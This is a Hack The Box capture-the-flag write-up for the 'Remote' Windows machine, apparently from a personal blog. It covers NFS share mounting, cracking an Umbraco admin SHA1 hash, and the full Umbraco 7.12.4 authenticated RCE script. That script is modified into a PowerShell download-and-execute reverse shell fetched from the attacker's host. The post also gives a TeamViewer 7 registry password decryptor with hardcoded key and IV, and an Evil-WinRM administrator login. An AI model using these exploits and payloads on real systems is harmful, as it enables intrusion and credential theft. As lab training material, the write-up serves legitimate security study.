Writeups

Hack The Box Writeup: Remote

Since a long time a new easy box appeared on Hack The Box. Now “Easy” is a label that in the previous machines could also switch to “Medium” so always a surprise. In this case, it really was a well-qualified machine that lived up to its name. The root-flag was also accessible via a remote solution.

Hack The Box Remote Infocard

[0x1] Reconnaissance & Enumeration

The kickoff has tarted with Nmap. From the scan, several interesting ports show up, such as port 21, 80 but especially 2049. This is the port used for NFS. Also, 5985 is open, which may mean that a WINRM connection can be used.

nmap -sC -sV -p- -oA remote_allports 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 13:57 GMT
Stats: 0:58:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 89.28% done; ETC: 15:02 (0:06:57 remaining)
Nmap scan report for 10.10.10.180
Host is up (0.077s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo: 
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m56s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2020-03-22T15:04:53
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3943.15 seconds

[0x2] Initial Foothold

Port 2049 is therefore used for NFS. This can mean access to a shared volume or folder, or a nice made-up rabbit hole. I use showmount to view the available mountpoints.

showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

The mount point site_backups sounds interesting and is easy to mount to an existing folder on my Parrot machine. In this case, I mount it to /tmp/htbremote so I can see what the content is.

mount -t nfs 10.10.10.180:/site_backups /tmp/htbremote

A list of folders and files from which you can directly see what kind of website backup it is, namely the Open-Source Content Management System “Umbraco”.

ls -sla
total 119
 4 drwx------ 2 nobody 4294967294 4096 Feb 23 18:35 .
 0 drwxrwxrwt 1 root root 1324 Mar 22 18:57 ..
 1 drwx------ 2 nobody 4294967294 64 Feb 20 17:16 App_Browsers
 4 drwx------ 2 nobody 4294967294 4096 Feb 20 17:17 App_Data
 4 drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 App_Plugins
 1 drwx------ 2 nobody 4294967294 64 Feb 20 17:16 aspnet_client
48 drwx------ 2 nobody 4294967294 49152 Feb 20 17:16 bin
 8 drwx------ 2 nobody 4294967294 8192 Feb 20 17:16 Config
 1 drwx------ 2 nobody 4294967294 64 Feb 20 17:16 css
 1 -rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
 1 -rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
 4 drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Media
 1 drwx------ 2 nobody 4294967294 64 Feb 20 17:16 scripts
 8 drwx------ 2 nobody 4294967294 8192 Feb 20 17:16 Umbraco
 4 drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Umbraco_Client
 4 drwx------ 2 nobody 4294967294 4096 Feb 20 17:16 Views
28 -rwx------ 1 nobody 4294967294 28539 Feb 20 05:57 Web.config

While searching one of the log files, I found a reference to the possible username of the admin user of the Umbraco CMS, namely: admin@htb.local.

/tmp/htbremote/App_Data/Logs]
└──╼ $cat UmbracoTraceLog.intranet.txt |grep user

2020-02-20 02:27:47,239 [P3592/D3/T44] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: User: admin@htb.local logged in from IP address 192.168.195.137

In the web.config file, I found a connection string referring to Umbraco.SDF, a Microsoft SQL CE database used by the CMS. This file could be found in the App_Data folder and opened by means of a text editor. The content was poorly readable, but the snippet below could be extracted from it. The name of the administrator is Administrator with username admin and a SHA1 password hash: b8be16afba8c314ad33d812f22a04991b90e2aaa. For now, I have left Ssmith for what it was.

Administrator admin b8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
ssmith ssmith@htb.local 8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.local
ssmith@htb.local

SHA1-hashes are fine to crack with Hashcat. The hash type is m100 and through the Rockyou wordlist I get the password: baconandcheese back.

hashcat -m 100 sha1_hash_admin /usr/share/wordlists/rockyou.txt --force
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 2048/4462 MB allocatable, 4MCU 

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1


Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese

Session..........: hashcat
Status...........: Cracked
Hash.Type........: SHA1
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Tue Mar 24 18:47:23 2020 (7 secs)
Time.Estimated...: Tue Mar 24 18:47:30 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1368.1 kH/s (0.37ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 9826304/14344385 (68.50%)
Rejected.........: 0/9826304 (0.00%)
Restore.Point....: 9822208/14344385 (68.47%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: badboi56 -> bacano1106

Started: Tue Mar 24 18:46:57 2020
Stopped: Tue Mar 24 18:47:31 2020

With the found username and password combination I try to access the Umbraco CMS to make sure they work.

The account details are correct! In the CMS you can see that version 7.12.4 is currently in use. Through Searchsploit I find a known exploit for this version of Umbraco.

[0x3] Path to User flag

searchsploit umbraco
------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title | Path
                                                                                     | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------- ----------------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | exploits/windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | exploits/aspx/webapps/46153.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting | exploits/php/webapps/44988.txt
------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

The exploit needs an administrator account, which is convenient because I have just tested it and it works. I add the data to the exploit and choose to test if the ping.exe command can reach my IP address.

# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A


import requests;

from bs4 import BeautifulSoup;

def print_dict(dico):
    print(dico.items());

print("Start");

# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "10.10.10.180"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "ping.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);

# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);

# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);

soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};

# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);

print("End");

Starting the exploit does not require any additional parameters, so it is not more than running 46153.py.

python 46153.py
Start
[]
End

II have tcpdump open to log incoming ICMP traffic and it looks like I get a ping on my machine from Remote.

tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
19:42:09.278662 IP 10.10.10.180 > 10.10.14.36: ICMP echo request, id 1, seq 9, length 40
19:42:09.278702 IP 10.10.14.36 > 10.10.10.180: ICMP echo reply, id 1, seq 9, length 40
19:42:10.281157 IP 10.10.10.180 > 10.10.14.36: ICMP echo request, id 1, seq 10, length 40
19:42:10.281210 IP 10.10.14.36 > 10.10.10.180: ICMP echo reply, id 1, seq 10, length 40
19:42:11.339095 IP 10.10.10.180 > 10.10.14.36: ICMP echo request, id 1, seq 11, length 40
19:42:11.339140 IP 10.10.14.36 > 10.10.10.180: ICMP echo reply, id 1, seq 11, length 40
19:42:12.311911 IP 10.10.10.180 > 10.10.14.36: ICMP echo request, id 1, seq 12, length 40
19:42:12.311978 IP 10.10.14.36 > 10.10.10.180: ICMP echo reply, id 1, seq 12, length 40

Now that the exploit is working it’s just a matter of configuring another payload. I choose a Powershell Reverse Shell and call it via a url referring to my own machine. So the exploit downloads the Reverse Shell, runs it and connects back to my machine.

payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "-c IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.36:8080/revshell.ps1\')"; System.Diagnosti>
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

To run the exploit, I start a netcat listener on port 1337 to capture the incoming session. I use Rlwrap to make sure the limited shell has a bit more features like command history.

rlwrap netcat -lvnp 1337

Nu de listener actief is start ik opnieuw de exloit op basis van de nieuwe payload.

python 46153.py
Start
[]

Now the listener is active I will start the exloit again based on the new payload.

whoami
iis apppool\defaultapppool

The only additional users are the Administrator and Public. After a quick check, the following contains the well-known user.txt.

cd Public
dir
    Directory: C:\users\Public


Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d----- 3/26/2020 1:54 PM toto
d-r--- 9/15/2018 3:19 AM Videos
-a---- 3/26/2020 1:54 PM 7168 meter.win_x64_8091.exe
-ar--- 3/26/2020 11:11 AM 34 user.txt

Yep, this is the User flag. Now continue to find out how to get the Root-flag. Given the name of the box, it has something to do with remote access.

type user.txt
3b7ee5c22035fd364c11a4a32dceb3f3

[0x4] Path to Root flag

While searching in Program Files (x86) folder I come across the installation folder of TeamViewer. Now let this one be developed for Remote access :)

PS C:\windows\system32\inetsrv> cd c:\progra~2
PS C:\Program Files (x86)> dir
    Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
d----- 9/15/2018 3:28 AM Common Files 
d----- 9/15/2018 5:06 AM Internet Explorer 
d----- 2/23/2020 2:19 PM Microsoft SQL Server 
d----- 2/23/2020 2:15 PM Microsoft.NET 
d----- 2/19/2020 3:11 PM MSBuild 
d----- 2/19/2020 3:11 PM Reference Assemblies 
d----- 2/20/2020 2:14 AM TeamViewer 
d----- 9/15/2018 5:05 AM Windows Defender 
d----- 9/15/2018 3:19 AM Windows Mail 
d----- 10/29/2018 6:39 PM Windows Media Player 
d----- 9/15/2018 3:19 AM Windows Multimedia Platform 
d----- 9/15/2018 3:28 AM windows nt 
d----- 10/29/2018 6:39 PM Windows Photo Viewer 
d----- 9/15/2018 3:19 AM Windows Portable Devices 
d----- 9/15/2018 3:19 AM WindowsPowerShell 

Version 7 of TeamViewer is indeed installed on this box.

PS C:\Program Files (x86)\TeamViewer\Version7> dir

    Directory: C:\Program Files (x86)\TeamViewer\Version7

Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
d----- 2/20/2020 2:14 AM x64 
-a---- 8/7/2012 6:36 AM 8485 CopyRights.txt 
-a---- 9/12/2012 7:36 AM 29920 License.txt 
-a---- 5/29/2015 1:17 PM 8034096 TeamViewer.exe 
-a---- 3/30/2020 1:15 PM 201471 TeamViewer7_Logfile.log 
-a---- 2/27/2020 10:35 AM 1049114 TeamViewer7_Logfile_OLD.log 
-a---- 5/29/2015 1:17 PM 2286896 TeamViewer_Desktop.exe   
..
..

Recently a vulnerability was found and recorded in a CVE around the way TeamViewer kept its passwords in the registry. The key and IV were identical for all installations, and this made it possible to decrypt the encrypted password. This allows remote script execution, but also privilege escalation if passwords are reused by the administrator. I found the information again in a blog by Why Not Security. Here also a Python script was made available with the exploit. All I need is the encrypted password.

In this case, the key should be in the hive HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7. Through REG QUERY I search in my session for the keys that can be found below. It says nicely: SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B.

PS C:\windows\system32\inetsrv> REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
    StartMenuGro
up REG_SZ TeamViewer 7
    InstallationDate REG_SZ 2020-02-20
    InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7
    Always_Online REG_DWORD 0x1
    Security_ActivateDirectIn REG_DWORD 0x0
    Version REG_SZ 7.0.43148
    ClientIC REG_DWORD 0x11f25831
    PK REG_BINARY BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B1
..[clip]..
B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
    SK REG_BINARY F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F6..[clip]..
0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
    LastMACUsed REG_MULTI_SZ \0005056B92FD5
    MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0}
    MIDVersion REG_DWORD 0x1
    ClientID REG_DWORD 0x6972e4aa
    CUse REG_DWORD 0x1
    LastUpdateCheck REG_DWORD 0x5e72893c
    UsageEnvironmentBackup REG_DWORD 0x1
    SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
    MultiPwdMgmtIDs REG_MULTI_SZ admin
    MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
    Security_PasswordStrength REG_DWORD 0x3
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7\AccessControl
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7\DefaultSettings

The Python script is simple and only requires an encrypted password from the registry. In this case, I can use the SecurityPasswordAES and enter it as hex_str_cipher. As you can see the key and iv are already known for the decryption. B464F582F6CE2D1E1F3DA7E8D376B26394E5B.

import sys, hexdump, binascii
from Crypto.Cipher import AES
class AESCipher:
    def __init__(self, key):
        self.key = key
    def decrypt(self, iv, data):
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)
key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"	# output from the registry
ciphertext = binascii.unhexlify(hex_str_cipher)
raw_un = AESCipher(key).decrypt(iv, ciphertext)
print(hexdump.hexdump(raw_un))
password = raw_un.decode('utf-16')
print(password)

When executing the exploit for the password, I get !R3m0te! back as password. If the password has indeed been reused (real world scenario) I should be able to log in as Administrator with it.

python tv7.py 
00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
None
!R3m0te!

The Nmap scan already revealed that port 5985 is open and thus also the possibility to connect via WinRM. To do this I use Evil-WinRM with the username Administrator and the password !R3m0te!. This gives a successful login as Administrator.

evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!'
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator

*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
remote

Let’s go to the standard location for the Root flag and tap away another machine. Remote is officially rooted.

C:\Users\Administrator\Documents> dir c:\users\Administrator\Desktop
    Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name 
---- ------------- ------ ---- 
-ar--- 3/30/2020 1:15 PM 34 root.txt 
*Evil-WinRM* PS C:\Users\Administrator\Desktop cat root.txt
ed5fa1271e365bbeb44d34200b57f194


All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail!


Tags

d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
%d bloggers like this: